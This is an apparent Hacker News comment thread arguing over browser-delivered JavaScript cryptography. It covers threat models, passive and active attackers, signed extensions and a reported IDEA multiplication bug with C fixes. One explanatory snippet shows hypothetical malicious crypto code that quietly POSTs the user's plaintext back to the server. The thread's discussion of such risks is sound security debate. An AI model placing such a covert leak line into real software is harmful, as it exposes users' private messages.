I thought this was a good post, but I wasn't impressed with the criticisms of other blog posts. Okay, perhaps I'm biased, because I wrote one of them, but how about I try to defend the other?
Perhaps the most objectionable thing about the Matasano article is its title. Otherwise it does a very good job of criticizing a particular way of engineering web cryptography that is, for lack of a better term, total bullshit. But is the approach criticized in the Matasano post used in the real world?
Let's try an experiment! Go to google.com and type in "encrypted chat"
If your results are similar to mine, one of the top 3 results will be "chatcrypt.com". Let's read the "How It Works?" page:
> Most people thinks that if a website uses a HTTPS connection (especially with the green address bar) then their "typed-in" informations are transmitted and stored securely. This is only partially true. The transmission is encrypted well, so no third party can sniff those informations, but there is no proof that the website owners will handle them with maximum care, not mentioning that the suitable laws can enforce anyone to serve stored data for the local authorities.
Okay, so this site attempts to implement end-to-end encryption in a web browser. Except... what's the problem? Oh, it looks like chatcrypt.com isn't served over HTTPS. In fact, if we try to visit the site over HTTPS, it doesn't work at all.
chatcrypt.com claims to keep your traffic secure using end-to-end cryptography implemented in JavaScript, except the JavaScript is being served in plaintext and is therefore easily MitMable.
Top 3 Google result for "encrypted chat"
Is the Matasano post that unreasonable? (besides the title) It pretty much describes that sort of site to a tee.
I mean, it is secure against passive adversaries... but that's nit-picking.
I concur that ChatCrypt has made a large number of mistakes, though. They don't use HTTPS, the code isn't open source, and the developer is practically anonymous.
I would still maintain that Matasano's article is problematic, though, because it has one of two effects on the reader:
1. The reader is thoroughly convinced, on a faulty basis, that JS crypto should never be used.
2. The reader is still adamant on continuing their project, but is now alienated from a source that could have offered a plethora of helpful advice. (Example: "Please, for all that is good, use HTTPS.")
Of course, nothing will prevent the occasional surfacing of bad crypto, but their article certainly doesn't help any of the causes it champions.
How about, instead of arguing that readers of an article are more convinced than they should be about something you yourself appear to be convinced of, you put your money where your mouth is and formulate an argument for a setting in which content-controlled browser Javascript is a sensible place to deploy cryptography. Give yourself the full benefit of every facility the web programming model gives you, up to the limit of installing browser extensions (at which point you're no longer talking about content-controlled code). What's a system like this that has worked well, and would be resilient to a determined adversary?
1) formulate an argument for a setting in which content-controlled browser Javascript is a sensible place to deploy cryptography.
1.a) Give yourself the full benefit of every facility the web programming model gives you, up to the limit of installing browser extensions.
2) What's a system like (1) that has worked well, and would be resilient to a determined adversary?
So, he's claiming to have shown that content-controlled browser javascript crypto is worse than useless because it allows good people to inadvertently leak secrets. All you have to do to prove him wrong is tell him a use case where it would make sense and then cite an example where that worked well* and would be resilient to a determined* adversary.
So, all you have to do is say "chatcrypt.com's use case makes sense and chatcrypt rocks. Here I show that it is unbreakable until long after the stars cool, and no amount of kneecap cryptography will lessen the adversary's burden."
* He's giving you two wiggle words already, you can define them however you'd like.
He means crypto from servers can't be trusted. You need something better. You need crypto running in a browser extension.
If I understood your article correctly, when you (bren2013) refer to in-browser crypto, you mean crypto code that is delivered from the server. But that's not the only in-browser crypto you can get: you can also get in-browser crypto delivered by a browser extension. Under this second definition of in-browser crypto, the following sentence in the article isn't accurate:
> there is nothing in-browser crypto can do to defend against active adversaries.
A construction or implementation is secure if an adversary, given a certain level of power, is unable to achieve a given objective. The level of power the adversary is assumed to have, together with their ultimate objective, is called the threat model.
If a new construction is secure under a new threat model that either increases the amount of power an adversary can have or makes the adversary's objective broader, the new construction is said to have a higher level of security.
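One way to make that precise (an illustrative, textbook-style formalization, not wording taken from the article), in LaTeX notation:

    % A construction is (t, \varepsilon)-secure under a threat model (P, G) if every
    % adversary \mathcal{A} limited to the powers P and to running time t satisfies
    \Pr[\, \mathcal{A}\ \text{achieves the objective}\ G \,] \le \varepsilon .
    % Granting the adversary more power (a larger P) or a broader objective G while
    % keeping the same bound is what "a higher level of security" means above.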
This is what we need more in security discussions. So many discussions, here on HN but also, well, everywhere, are really misunderstandings about which threat model to assume. People get into hot-headed fights about whether some solution somewhere is or is not "secure", when really all they disagree about is which definition of "secure" to use.
Well done! I propose that security related blog posts take some time out to casually define these terms over and over again, for a while, until we can all just assume them known and be done with all the vague imprecise nonsense.
This sounds important, but the distinction between "passive" and "active" attackers has come up in every discussion of JS crypto I can remember on HN, and indeed in every discussion of TLS (see, for instance, every discussion of why certificate authorities are necessary and why self-signed certificates are insecure "despite using exactly the same cryptography as CA-signed certificates").
I do not believe this is a dimension that has been missing from previous discussions, but perhaps you can use the search bar below to find a debate about JS crypto where it was missing and where the result was misleading to readers.
> but perhaps you can use the search bar below to find a debate about JS crypto where it was missing and where the result was misleading to readers.
Oh come on, was that sneer called for? If you really feel that none of the security discussions here on HN are getting way out of hand over what's really a misunderstanding on some basic assumptions, then you haven't been looking. Note, I didn't say "JS crypto discussions", I said "security discussions".
In fact, I'm mostly referring to the kinds of discussions that did not start as a security topic, but evolved into them. There, there's often people like me, who care about security but who are far from experts, and these people (myself included) often mix stuff up. Clearing out definitions and which threat model to assume would really help in such discussions. I thought that this blog post did that in a very clear and non-opinionated way in that little paragraph there, so I complimented it.
I suppose I'm expected to give a full-throated defense of the Matasano post, which I wrote, but I'm not going to. While I don't dislike the post as much as this author appears to, I don't much like it either. I wrote it in a single draft, all at once, as a sort of message board comment I'd write once and maybe in the future refer back to. I didn't promote it on HN and I'm not the reason it keeps getting cited.
None of this bickering changes a simple truth: when a web mail provider claims to provide "NSA-proof" end-to-end encryption, hosted in Switzerland just to be safe, using software that you don't have to install on your computers at all, then you need to assume that web mail provider can read your email, and so can anyone who can coerce that provider into doing something. If you believe that --- and you should --- then I don't care what you think about the rest of the Matasano article.
> None of this bickering changes a simple truth: when a web mail provider claims to provide "NSA-proof" end-to-end encryption, hosted in Switzerland just to be safe, using software that you don't have to install on your computers at all, then you need to assume that web mail provider can read your email, and so can anyone who can coerce that provider into doing something. If you believe that --- and you should --- then I don't care what you think about the rest of the Matasano article.
This. The whole article could be replaced with this paragraph, and it couldn't be clearer.
If you think that's the "simple truth," you either didn't read the article, or you have some piece of information you're not sharing with the rest of us.
You also know something about the "formalisms of HBC" (now redacted), and how it doesn't work with browsers that even scholars don't know about.
This comment appears to be totally unresponsive to mine.
Incidentally, the "now redacted" in the parent comment refers to three bullets I had written in the grandparent comment and left for four minutes before realizing that objecting in detail to this person's blog post more or less amounted to making a full-throated defense of the Matasano post. Which, like I said, I'm not in love with either.
One problem with the "passive adversary" attack is that even if the nonce+HMAC protocol defeats the passive adversary, you as a user have no way of verifying whether or not your adversary is passive. Or whether they exist, or, indeed, anything about them, as in the real world, you don't get to pick your adversaries. The user needs a way to determine whether the connection is secure before they can trust it, because they can't (correctly) assume that only passive adversaries exist.
So, if that is the best in-browser crypto can do, then it is still basically useless, unless you get to choose your adversary. And "active adversary" software is off-the-shelf tech, not some sort of bizarre thing only the NSA has access to. Active adversary is the lowest baseline of attack worth talking about.
No, you don't get to pick your adversaries, but you do get to pick the strongest one you wish to be secure against. Or for that matter, can be secure against. I briefly mentioned Diffie-Hellman key exchanges to provide an example of another common primitive that's only secure against passive adversaries. (DHKEs are typically used in peer-to-peer applications.)
Also, if you keep reading, I mention several uses for in-browser crypto.
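To spell out why an unauthenticated Diffie-Hellman exchange is the textbook passive-only example (a sketch in LaTeX notation, not specific to any implementation):

    % Passive eavesdropper: sees g^a and g^b but, under the usual DH assumptions,
    % cannot compute the shared key.
    A \to B:\ g^a, \qquad B \to A:\ g^b, \qquad k = g^{ab}
    % Active man-in-the-middle M: substitutes her own share in each direction, so
    % each party unknowingly shares a key with M instead of with the other party.
    A \to M:\ g^a,\quad M \to B:\ g^m, \qquad B \to M:\ g^b,\quad M \to A:\ g^m
    % yielding k_{AM} = g^{am} and k_{BM} = g^{bm}, both known to M.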
Let me say it again: as a user, you can't verify that you're secure against the attackers. This is my important point, not whether a particular chosen attack was blocked. Therefore, if you care at all about security, you can't trust the channel. You're only looking from the POV of the attacker, but you've got to consider all the POVs, including the user's, and not impute to them knowledge that they can't have about the universe ("I am only being attacked by passive attackers") in order to declare your system "more secure".
Saying "I'm secure against passive attackers" doesn't mean that you're safe doing anything on your "secure" channel, because the bar for active attack is so low that that's hardly saying anything. You can be secure against "passive attackers", but you still can't verify that you haven't been attacked, in general. A definition of security in which a user blithely sticks sensitive data on a channel, unconcerned about whether the channel was attacked, is a useless definition of security... by definition, we're not talking about a user concerned with security, of any kind.
If we are talking about a security scenario where the equivalent of "active attack" is actually quite difficult and it takes a nation-state's resources, I'd be happy to discuss this argument. We've historically used some encryption at points in time where technically brute forcing it was feasible for very large entities, for instance. But the bar for active attack on the web is low here, very, very low.
This is an example of the Perfectionist Fallacy I was talking about in the article.
You can't verify that someone isn't MiTM'ing with a stolen certificate. You can't verify that the CA hasn't been coerced into forging a valid certificate. You can't verify that your government hasn't ordered that computer manufacturers install surveillance devices. That doesn't mean that the internet is unusable.
Some things are vulnerable to active attacks, and if they were attacked, nobody would know. Every cryptographer knows this. It's not a big deal.
I didn't get the impression jerf was arguing for perfect security, so much as saying that securing only against a passive attacker is as useful for the user as not using TLS at all.
Selecting a threat model is all well and good, but if you select an artificially easy threat model to defend against then you're not really helping users (in this case, helping them against random evil ISPs?)
"If we are talking about a security scenario where the equivalent of "active attack" is actually quite difficult and it takes a nation-state's resources, I'd be happy to discuss this argument. We've historically used some encryption at points in time where technically brute forcing it was feasible for very large entities, for instance. But the bar for active attack on the web is low here, very, very low."
You expected to see a Perfectionist Fallacy argument, so you saw one. But it's not, because "active attacks" in this context don't require anything close to "perfection" to achieve. It's exactly the other way around... it requires near perfection to prevent them in the real world!
The problem with this argument is that you stop passing the buck where it's convenient for your argument, not at its actual conclusion. The only reality any one of us can actually be sure of is each of our own minds[0], therefore the only way to keep information secure is to never share it. Even then, our brains in vats could be under constant monitoring and decoding, making secrecy a futile exercise altogether.
Because a solipsistic worldview is, perhaps, irrelevant to everyday life, we begin to operate on assumptions based on information that's infeasible for us to know for certain. This is what you must do to talk about security on the Internet: limit the domain of the problem by making assumptions about the Internet's infrastructure. You're right that it will never be possible to share a secret on the Internet without risk, but that's not the point of this article or of any of the others that point out the flaws of JavaScript cryptography.
When you've been reduced to arguing about brains in vats, you're no longer having a technical conversation about security. We're talking about security here.
I read the whole article and the impression I have is that all the uses you have for in-browser crypto in the current web programming model involve resistance to passive-only attackers.
It's not clear to me if the author is endorsing the use of browser crypto in any particular scenario. Regardless, probably the most common reason for wanting browser crypto is to protect the data before it hits the server, thus protecting against a malicious or compromised server.
For example, consider a web-based mail client. You want to send an encrypted message, say via PGP, and you don't want the server to be able to read it, even if the server is evil. You'd like to be able to do the PGP encryption 100% in-browser, with no browser plugins or extensions necessary.
I think that's the most common category of use-case for browser crypto. Unfortunately, it's one where browser crypto plainly doesn't work. The whole point here is to defend against an evil server, but if the server is evil, it will send you evil crypto JS. TLS doesn't help you. Nobody's impersonating the server or altering the JS file in transit. You're getting an authentic copy of the JS file from the real server. It just happens to be an authentic copy of an evil JS file.
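To make the failure mode concrete, here is a hedged sketch (hypothetical names, not taken from any real product) of what an "authentic copy of an evil JS file" can look like; TLS delivers it faithfully because the legitimate server is the one serving it:

    // Hypothetical: what a compromised or coerced server could ship in place of its
    // usual crypto bundle. The page still "does PGP in the browser"; it just also
    // leaks the plaintext back to the very server the user wanted to defend against.
    declare function realPgpEncrypt(plaintext: string, recipientKey: string): Promise<string>;

    async function encryptMessage(plaintext: string, recipientKey: string): Promise<string> {
      const ciphertext = await realPgpEncrypt(plaintext, recipientKey); // looks legitimate
      void fetch("/telemetry", { method: "POST", body: plaintext });    // the line nobody audits
      return ciphertext;
    }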
Given that, what can you do with browser crypto, practically speaking?
It still might protect you if you don't access the server while it's compromised. It protects you from someone just hacking your server, downloading all the data and getting away.
Also, you might serve the files that do the encryption from a different server that's smaller, better protected, more stable, and that fewer people have access to.
> It still might protect you if you don't access the server while it's compromised.
The end user can't know when that's the case.
> Also, you might serve the files that do the encryption from a different server that's smaller, better protected, more stable, and that fewer people have access to.
That doesn't provide any assurance to the end user that the JS isn't malicious.
Remember, "compromise" doesn't just refer to a drive-by hack. The site operators themselves may become compromised (or start that way), and deliberately serve malicious JS. Users can't know when that's the case. When it is the case, the strategy you suggested offers no protection, because the "more secure" JS server is still under the control of the bad actor.
>> It still might protect you if you don't access the server while it's compromised.
> The end user can't know when that's the case.
Yes. I didn't say that the user can know whether he is protected, just that he is when this condition is met.
> Remember, "compromise" doesn't just refer to a drive-by hack. The site operators themselves may become compromised (or start that way), and deliberately serve malicious JS. Users can't know when that's the case. When it is the case, the strategy you suggested offers no protection, because the "more secure" JS server is still under the control of the bad actor.
Didn't you just do what OP criticizes? I said it has value in some scenarios assuming some threat model, and you countered by showing that it doesn't protect you in some other threat model. When you don't trust the third party, the only way to protect yourself is to never rely on anything they control, and especially to never run their software on your machine in a way that gives it access to your secret data. In that scenario, any type of encryption other than one built into the browser binary (not supported? risky?) or, better yet, outside the browser (cumbersome) is pointless.
> > It still might protect you if you don't access the server while it's compromised.
> The end user can't know when that's the case.
This is the entire point of the article. You can't know if that's the case, but you can't with any software distribution either. When you type 'apt-get install opensshd', how do you know if you're getting the package from an uncompromised server?
You just have to trust that the public keys you got are the right ones, and their private keys have not been stolen.
So what the author is saying is that regarding that aspect web crypto is at roughly the same level.
The big problem of course is that there is evidence that the whole CA system is much less reliable than the old GPG signing party system.
> When you type 'apt-get install opensshd', how do you know if you're getting the package from an uncompromised server?
If you don't take any steps to verify the integrity, then you don't know.
The big difference, as I see it, is that the JS code gets served over and over again to the same clients. Every time you visit the website, it can load a new version of the JS.
Even if you do verify the integrity of the package, then you still can't know for absolute certain that the package maintainer hasn't somehow exposed their private key or been otherwise compromised. You have to trust them.
If the package maintainer has exposed their private key, and yet the package itself is intact, what harm is there (at the moment)? With the key compromised, you could have been MITMed, but you weren't. You could be MITMed in the future, but that's a problem for another day.
I just saw this reply, and I have to clarify: the moment the maintainer's key is compromised, it becomes possible for someone to MITM. It's not clear if that's what you were saying, but that's how it is, and that's absolutely a problem as soon as the key is compromised (particularly if he/she was targeted).
Server-side crypto protects you from someone just hacking your server and downloading the data too.
Serving from a smaller and more protected server is interesting, but you'd have to serve at least the HTML as well as every piece of JavaScript (not just the crypto) which doesn't leave too much room for other stuff. And why not just do the crypto server-side on that smaller, more protected server then?
> but you'd have to serve at least the HTML as well as every piece of JavaScript (not just the crypto)
You are right.
> which doesn't leave too much room for other stuff.
Well... HTML and JS can be light and static. Backend stuff is what might require multiple servers, databases and lots of people involved.
> And why not just do the crypto server-side on that smaller, more protected server then?
Because you'd have to pass all of the data that you want to secure through it. Besides, server-side crypto is surely more complicated and would need more people involved, especially with a large volume of data, than just serving static files.
lol, this is exactly what I was trying to stop people from doing! I'm not endorsing or damning it--I'm talking about it sensibly and objectively so people can learn to use it properly.
Please read the article again carefully. I think you'll find the answers to your questions.
While you might be formally correct, your criticism still seems about as sensible as criticising someone who said "a tank made of paper sheets is not secure" because they failed to specify a threat model. After all, such a tank would be secure against a paralyzed attacker without weapons.
Yes, it is important to be aware that security is always relative to a threat model, and at times it can lead to confusion when threat models are not made explicit. That does not mean, though, that it's necessarily wrong to imply a sensible threat model in a given context, and to just call something "insecure" without any further explicit qualifications if it does not protect against a reasonable minimal threat model that essentially everyone always has to face.
Also, it's questionable whether you can call the NSA's mass surveillance a passive attack, given that QUANTUM INSERT exists and was used to attack foreign communications infrastructure.
This is also precisely the problem I was trying to avoid by introducing formality.
Is it like saying that a tank made of paper sheets is insecure, or is it like saying that a heavily-armored tank is insecure (against a nuclear weapon)?
It is never okay to omit important information like the threat model in cryptography. That information is essential to the system's analysis.
> Is it like saying that a tank made of paper sheets is insecure
Yes, I'd say it's more like that one. The technology is insecure against threat models it is almost certain to face.
> or is it like saying that a heavily-armored tank is insecure (against a nuclear weapon)?
No, I don't think it's like that one. A tank could realistically participate in a nuclear conflict, but that's not necessarily what a tank is intended for. Whereas, JS crypto is presumably intended to protect users when the remote server can't be trusted. (What else would it be for?) It can't offer such protection.
What about a secret message web widget on a shared computer that uses localstorage as a database and requires the recipient to enter a password to reveal the message, or an offline diary app made with node-webkit that encrypts diary entries? There are lots of uses for JS crypto in cases where information will never leave a local computer. I know that's not what you were saying, but I think it's important to realize that JS has gone beyond remote delivery at this point.
The problem is that with the in-browser use case, which is what this whole discussion is about, the code being executed locally came from a remote source. For all of the reasons that Matasano and the others name, it is impossible to ensure that the code does what it claims to. So even if all of your data is stored locally, you have no strong way to ensure that the code performing the cryptographic functions is not secretly compromised by an attacker so that, for example, it sends your data in the clear to some remote server.
Even though it often isn't spelled out, this is mostly about content-controlled JS loaded from the web, though the language itself also has its problems. And security-wise that app would not be better than one that stored the messages on a server, which only allows you to read them back when you provide the password.
That's the part to which I'm objecting. As I asked above, what is the proper use of JS crypto? What real-world application do you have in mind where JS crypto's level of security is adequate?
Packaged in a signed browser extension is a good start. Or packaged in a signed desktop app that runs JS to drive the UI (xulrunner, node-webkit, ...).
In general, anywhere you aren't basically doing what amounts to an eval() on an external resource (so packaging everything locally, aggressively filtering XSS attacks) can be a good use of JS crypto.
I don't think JS crypto itself is the issue. I think the issue is more pulling your code from an external, ultimately untrusted source. You can do this in many languages, and it's equally a Terrible Idea in all of them. Granted, some things auto-update and can verify an update via a packaged public key, but the model of continuously downloading code on each run, while easier on app developers, is a ticking time bomb for crypto.
> Packaged in a signed browser extension is a good start. Or packaged in a signed desktop app that runs JS to drive the UI (xulrunner, node-webkit, ...).
Those are probably acceptable in principle. I should have been more specific: I was referring only to the scenario wherein the webserver provides the JS.
Well, now that we have WebRTC, peer-to-peer data transfer is possible in the browser. Perhaps you could imagine a p2p scenario where browser crypto is useful?
One aspect of in-browser functionality OP mentions is "offline". However, browsers are pretty cool in that they can mix offline and online. You can open a local html file and it can then make online requests. Alternatively, you can request an html file online that then can access local files.
This ability to mix offline and online content is something that I think has a lot of potential to improve client-side encryption. Specifically, client-side encryption coupled with an unhosted webapp[1].
I've been exploring this potential for my byoFS[2] project, and made an example end-to-end encrypted chat demo[3]. You can request the app anonymously (or even save it and open it locally). The app then lets the user connect an online datastore (e.g. Dropbox) to save the encrypted chats.
This separates who serves the anonymous static webapp and the authenticated datastore, and makes it much harder to target a javascript attack (the most common attack from the Snowden leaks).
In a project I'm working on [1], I'm planning to provide a browser extension that verifies the source code is digitally signed and that it matches the source code published on GitHub. I believe this creates a pretty good security model for a web-based app, even more so than most desktop programs.
Some more information from the security page [2]:
The browser extension provides improved security by verifying the integrity of the files served by the server. The verification is done using two factors:
- Cold storage signature verification: In addition to SSL, static files (html/css/javascript) are signed using standard Bitcoin message signatures, with a private key that is stored offline and encrypted. This ensures that the content served from the webserver was not tampered with by a third party.
- Comparing against the code on the GitHub repository: The source code from the GitHub repository is built on Travis-CI and the resulting hashes are published publicly on Travis's job page. The extension ensures that the content served by the webserver matches the open-source repository on GitHub.
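To make the second check concrete, here is a hedged sketch in TypeScript (placeholder names like PUBLISHED_HASHES, not the project's actual code, and ignoring the separate signature check): hash each served static file with Web Crypto and compare it against the hash published by the CI build.

    // Illustrative only: compare a served file against a hash published out of band
    // (e.g. on the Travis job page). PUBLISHED_HASHES is a placeholder for however
    // the extension ships or fetches the expected values.
    const PUBLISHED_HASHES: Record<string, string> = {
      "/app.js": "<hex SHA-256 digest published by the CI build>",
    };

    async function sha256Hex(data: ArrayBuffer): Promise<string> {
      const digest = await crypto.subtle.digest("SHA-256", data);
      return Array.from(new Uint8Array(digest))
        .map((b) => b.toString(16).padStart(2, "0"))
        .join("");
    }

    async function servedFileMatchesPublishedHash(path: string): Promise<boolean> {
      const body = await (await fetch(path)).arrayBuffer();
      return (await sha256Hex(body)) === PUBLISHED_HASHES[path]; // warn or block on mismatch
    }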
If an attacker gains control over the web server, he still only has access to information the web server already knows (which is very little). To get sensitive information, he would have to modify the client-side code to send back more data to the server.
For an attacker to successfully mount such an attack against someone with the browser extension, he would have to:
- Gain access to the web server.
- Gain access to the personal computer of a developer with commit access to the GitHub repository. [3]
- Commit his changes to the public GitHub repository, where they can be seen by anyone. [3]
- Gain physical access to the offline machine with the private key and know the passphrase used to encrypt it.
So what happens when github goes down? I'd argue a better source for this sort of thing would be to put the hash in dns, either directly in a txt record, or using hacks involving A or AAAA records. Your nameserver almost certainly has more security than your github repo.
That would be really sweet if you could access DNS directly in client-side Javascript, particularly given the existence of DNSSEC (great for bootstrapping trust).
Alas, client-side JavaScript doesn't speak DNS. You'd have to go through a server, which would mean you'd lose anything you might gain.
So, you have just made GitHub the trusted third party for the world? After the X.509 CAs have so successfully protected us all these years without a single compromise or other security blunder and nobody is working on ways to get rid of those single points of failure, especially not the people behind certificate patrol or monkey sphere, that must be the best security model ever!
Why do people use styles like these that push all the content uncomfortably to the sides? 40% of the screen is dedicated to what? The blog title and a link home.
- Statically encrypt and publish content on an HTTP server
- Transmit these via HTTP to an iframe component in the client browser
- Transmit decryption and key routines using HTTPS
- The HTTP-iframe locally sends the message to the HTTPS-iframe via window.postMessage()
- The HTTPS-iframe decrypts the content (with a pre-shared key) and renders it on the page
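A hedged sketch of the last two steps (hypothetical origins and key handling; the pre-shared AES-GCM key is assumed to have been provisioned out of band): the HTTPS-served iframe accepts the ciphertext via postMessage, checks the sender's origin, decrypts with Web Crypto, and renders the result as text.

    // Inside the HTTPS-served iframe (sketch only). PRE_SHARED_KEY is assumed to be
    // an AES-GCM CryptoKey provisioned elsewhere; the origins are placeholders.
    declare const PRE_SHARED_KEY: CryptoKey;

    window.addEventListener("message", async (event: MessageEvent) => {
      if (event.origin !== "http://content.example.com") return; // only accept the HTTP iframe
      const { iv, ciphertext } = event.data as { iv: Uint8Array; ciphertext: Uint8Array };
      const plaintext = await crypto.subtle.decrypt(
        { name: "AES-GCM", iv },
        PRE_SHARED_KEY,
        ciphertext
      );
      document.body.textContent = new TextDecoder().decode(plaintext); // render as text, not HTML
    });

    // And in the HTTP-served iframe, forwarding the statically encrypted blob:
    //   httpsFrame.contentWindow.postMessage({ iv, ciphertext }, "https://viewer.example.com");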
Ten years from now, when web security is even more laughable and anemic than it already is, some of us are going to remember discussions like these where application developers at large ignored the warnings from the established crypto community. Some of us are old enough already to remember this pattern happening before.
I understand the strong reaction to the actions of the NSA, but all this is doing is providing the appearance of security while not making it any more difficult for adversaries like the NSA.
"they just make the task of programming a crypto library a bit more fun and challenging, not riskier"
Seriously? It makes it more difficult to get things right, but the risk of getting it wrong is not increased? And that after you just described how the challenges of JS have already directly led to vulnerabilities?
Also, you mostly don't really support your own argument. How exactly does a malicious server not affect "crypto browser apps"? How does staying out of scope for PCI DSS have anything to do with security (except maybe demonstrating that PCI DSS is crap because it can so easily be circumvented)? Also, in what kind of scenario would leaking info in a referer be a problem, but leaking the same info in encrypted form would not? And how do you guarantee that your verification code is loaded fresh from the server once your application has been compromised in a browser?
> Seriously? It makes it more difficult to get things right, but the risk of getting it wrong is not increased? And that after you just described how the challenges of JS have already directly led to vulnerabilities?
Well, it seems that you misunderstood which challenges I was talking about. Lack of types is a big problem, but besides that, nothing else makes the risk bigger.
> How exactly does a malicious server not affect "crypto browser apps"?
I didn't claim that malicious servers won't be able to affect crypto browser apps. What I said is that in these apps you have to trust the server already, so it doesn't make sense to consider them untrusted.
> How does staying out of scope for PCI DSS have anything to do with security (except maybe demonstrating that PCI DSS is crap because it can so easily be circumvented)?
That's exactly the point. When people say "javascript crypto is harmful" they don't consider use cases where it's really useful, even just to circumvent PCI DSS.
> Also, in what kind of scenario would leaking info in a referer be a problem, but leaking the same info in encrypted form would not?
I don't understand this question.
> And how do you guarantee that your verification code is loaded fresh from the server once your application has been compromised in a browser?
Because every time I refresh my browser I get a chance to get some trusted code from the server.
> Well, it seems that you misunderstood which challenges I was talking about. Lack of types is a big problem, but besides that, nothing else makes the risk bigger.
So, it isn't actually a bit more challenging then?
Also, it seems to me like you are at least forgetting timing and possibly other side channels.
> I don't understand this question.
I just can't see any actual scenario where that helps, mostly because it seems to me that the cipher text usually would be a plain-text equivalent, so it doesn't really matter to the attacker whether they have the plain text or the cipher text.
> Because every time I refresh my browser I get a chance to get some trusted code from the server.
So, in other words, you don't have a guarantee?
Other than that, and in general, it seems to me that your argument is somewhat of an equivocation fallacy: You are essentially redefining crypto to include kinda-non-crypto, to then claim that this redefined crypto actually can sensibly be used in browser-side JS, and therefore the arguments against the use of the original crypto are somehow not good advice.
I would think that it is rather obviously implied in most criticism of JS crypto that you are not just executing code that performs a cryptographic primitive, but that you are actually using it to achieve some security goal, and in particular that you are using client-side JS rather than some server-side crypto for some security advantage. That is essentially the implied vague threat model.
So, yeah, it's true that there are uses for crypto primitives that aren't affected by that threat model, because they aren't about security at all. And others that are less affected for various reasons. But it's highly misleading to therefore claim that "most applications aren't affected by that threat model". I'd think that most applications actually are. Except for those built by people who do understand enough of cryptography to not need posts such as the one by matasano. That is to say: Yes, once you yourself can write such an FAQ, you might be able to make use of JS crypto. But at that point, that post won't keep you from doing it anyhow. If you can't, though, chances are you first need to understand every single point made in it.
> So, it isn't actually a bit more challenging then?
More challenging, yes. Riskier, no.
I don't like that Javascript doesn't have native support for big integers (like Python does), or that it stores numbers as floating points in a 52-bit mantissa, but I fail to see why this makes developing crypto code riskier.
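A quick illustration of why the mantissa point matters for crypto code (a trivial sketch, runnable in any JS/TS console):

    // Integers above 2^53 can no longer be represented exactly, which is why
    // multi-precision arithmetic in JavaScript is built from small "limbs"
    // (e.g. 16- or 28-bit chunks) instead of plain numbers.
    const limit = 2 ** 53;                 // 9007199254740992
    console.log(limit === limit + 1);      // true: 2^53 + 1 rounds back to 2^53
    console.log(Number.MAX_SAFE_INTEGER);  // 9007199254740991, i.e. 2^53 - 1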
> Also, it seems to me like you are at least forgetting timing and possibly other side channels.
Well, I ain't. When you don't control the instructions being executed by the CPU, you run the risk of leaking security-sensitive information. This applies not only to Javascript, but also to all scripting languages. I could say that it also applies to Java, if the methods in its BigInteger class aren't fixed-timing.
In other words using Javascript doesn't make the problem any worse. If you disagree, you're invited to take a look at End-To-End, find a side-channel leak and write an exploit for it. You could earn serious cold cash with that finding.
> I just can't see any actual scenario where that helps, mostly because it seems to me that the cipher text usually would be a plain-text equivalent, so it doesn't really matter to the attacker whether they have the plain text or the cipher text.
I described where it helps in my article.
Re your last point: if doing SSH in a browser isn't crypto I don't know what could be. Is the only thing you consider Javascript crypto encrypted webmail? That's your problem then. You know one wrong use case, and you refuse to admit that there are other legitimate ones.
Edit: remove a few unnecessary sentences.
Edit: some people don't like Javascript crypto so much that they downvote me without saying anything.
Please explain. Is it that it is more challenging, but in a way that it's not more difficult to get it right (what exactly is the challenge then?) or is it not riskier because the higher probability of getting it wrong does not decrease the probability of getting it right (how exactly do you increase one probability without decreasing the probability of the negated case?)?
> This applies not only to Javascript, but also to all scripting languages.
So, a bridge built from matches isn't any more robust than a bridge built from toothpicks, therefore building bridges from toothpicks is a good idea (nevermind that other people are using reinforced concrete for bridge construction)? I'm sorry, but I can't quite follow your argument.
> If you disagree, you're invited to take a look at End-To-End, find a side-channel leak and write an exploit for it. You could earn serious cold cash with that finding.
You are not seriously bringing forward the "secure-because-hacking-contest" argument, are you?
> Re your last point: if doing SSH in a browser isn't crypto I don't know what could be.
Sure it is, but it still is rather obviously not what those posts are primarily attacking. Or maybe it is, if anyone claims or implies that this "SSH-client in a browser" is any more secure than "browser frontend to SSH-client on the server". Which I think is kinda the whole reason for its existence? Performance- and complexity-wise, I doubt that it makes any sense at all to implement the SSH protocol itself in the browser in that case, vs. using a native SSH client on the server.
> If you disagree, you're invited to take a look at End-To-End, find a side-channel leak and write an exploit for it. You could earn serious cold cash with that finding.
For one thing, the IDEA implementation seems to be incorrect. In IDEA, multiplication is defined as multiplication modulo 2^16 + 1, where 0 means 2^16 [3]. However, in the multiplication function, when x == 0 but y != 0, the result of the modular multiplication is always 0, when it should not be. The correct code would be (in glorious C syntax, everything unsigned and 32-bit):
    unsigned mul(unsigned x, unsigned y) { /* IDEA mul mod 2^16 + 1; 0 encodes 2^16 */
        unsigned r;
        if (x != 0) {
            if (y != 0)
                r = (x * y) % 65537;  /* both in [1, 65535], product fits in 32 bits */
            else
                r = 65537 - x;        /* y encodes 2^16, i.e. -1 mod 2^16 + 1 */
        } else {
            r = 65537 - y;            /* x encodes 2^16; also covers x == y == 0 */
        }
        return r & 0xFFFF;            /* store 2^16 as 0, per the IDEA convention */
    }
Of course, even if correct this code is still vulnerable to timing attacks (under contrived conditions) [1]. This can be worked around using a little bitwise magic:
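(Sketch of one standard branch-free formulation, not necessarily the exact trick meant here, and assuming the compiler emits branch-free code for the comparisons; it relies on the identity t mod 65537 = lo - hi, plus 65537 if lo < hi, for t = x*y with lo the low and hi the high 16 bits of t.)

    unsigned mul_ct(unsigned x, unsigned y) {          /* sketch of a branch-free IDEA mul */
        unsigned t  = x * y;                           /* zero only when x == 0 or y == 0 */
        unsigned lo = t & 0xFFFF, hi = t >> 16;
        unsigned r1 = (lo - hi + (lo < hi)) & 0xFFFF;  /* t mod 65537, with 2^16 stored as 0 */
        unsigned r0 = (1 - x - y) & 0xFFFF;            /* covers the cases x == 0 or y == 0 */
        unsigned nz = 0u - (t != 0);                   /* all-ones mask when t != 0 */
        return (r1 & nz) | (r0 & ~nz);                 /* select without branching on secrets */
    }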
Additionally, the modular inversion seems to be needlessly complicated by using Euclid's algorithm (and I'm not sure it's correct either: it seems not to respect the "0 means 2^16" rule). Use the usual a^(p-2) mod p inversion trick, using an optimal addition chain [2], to make it simpler, constant-time, and possibly faster.
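For reference, the inversion trick being recommended is just Fermat's little theorem applied to the IDEA modulus (a standard identity, not End-To-End's code):

    a^{p-1} \equiv 1 \pmod{p} \;\Rightarrow\; a^{-1} \equiv a^{p-2} \pmod{p}
    \quad \text{for prime } p \text{ and } a \not\equiv 0 \pmod{p};
    \text{here } p = 2^{16} + 1, \text{ so } a^{-1} \equiv a^{65535} \pmod{65537}.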
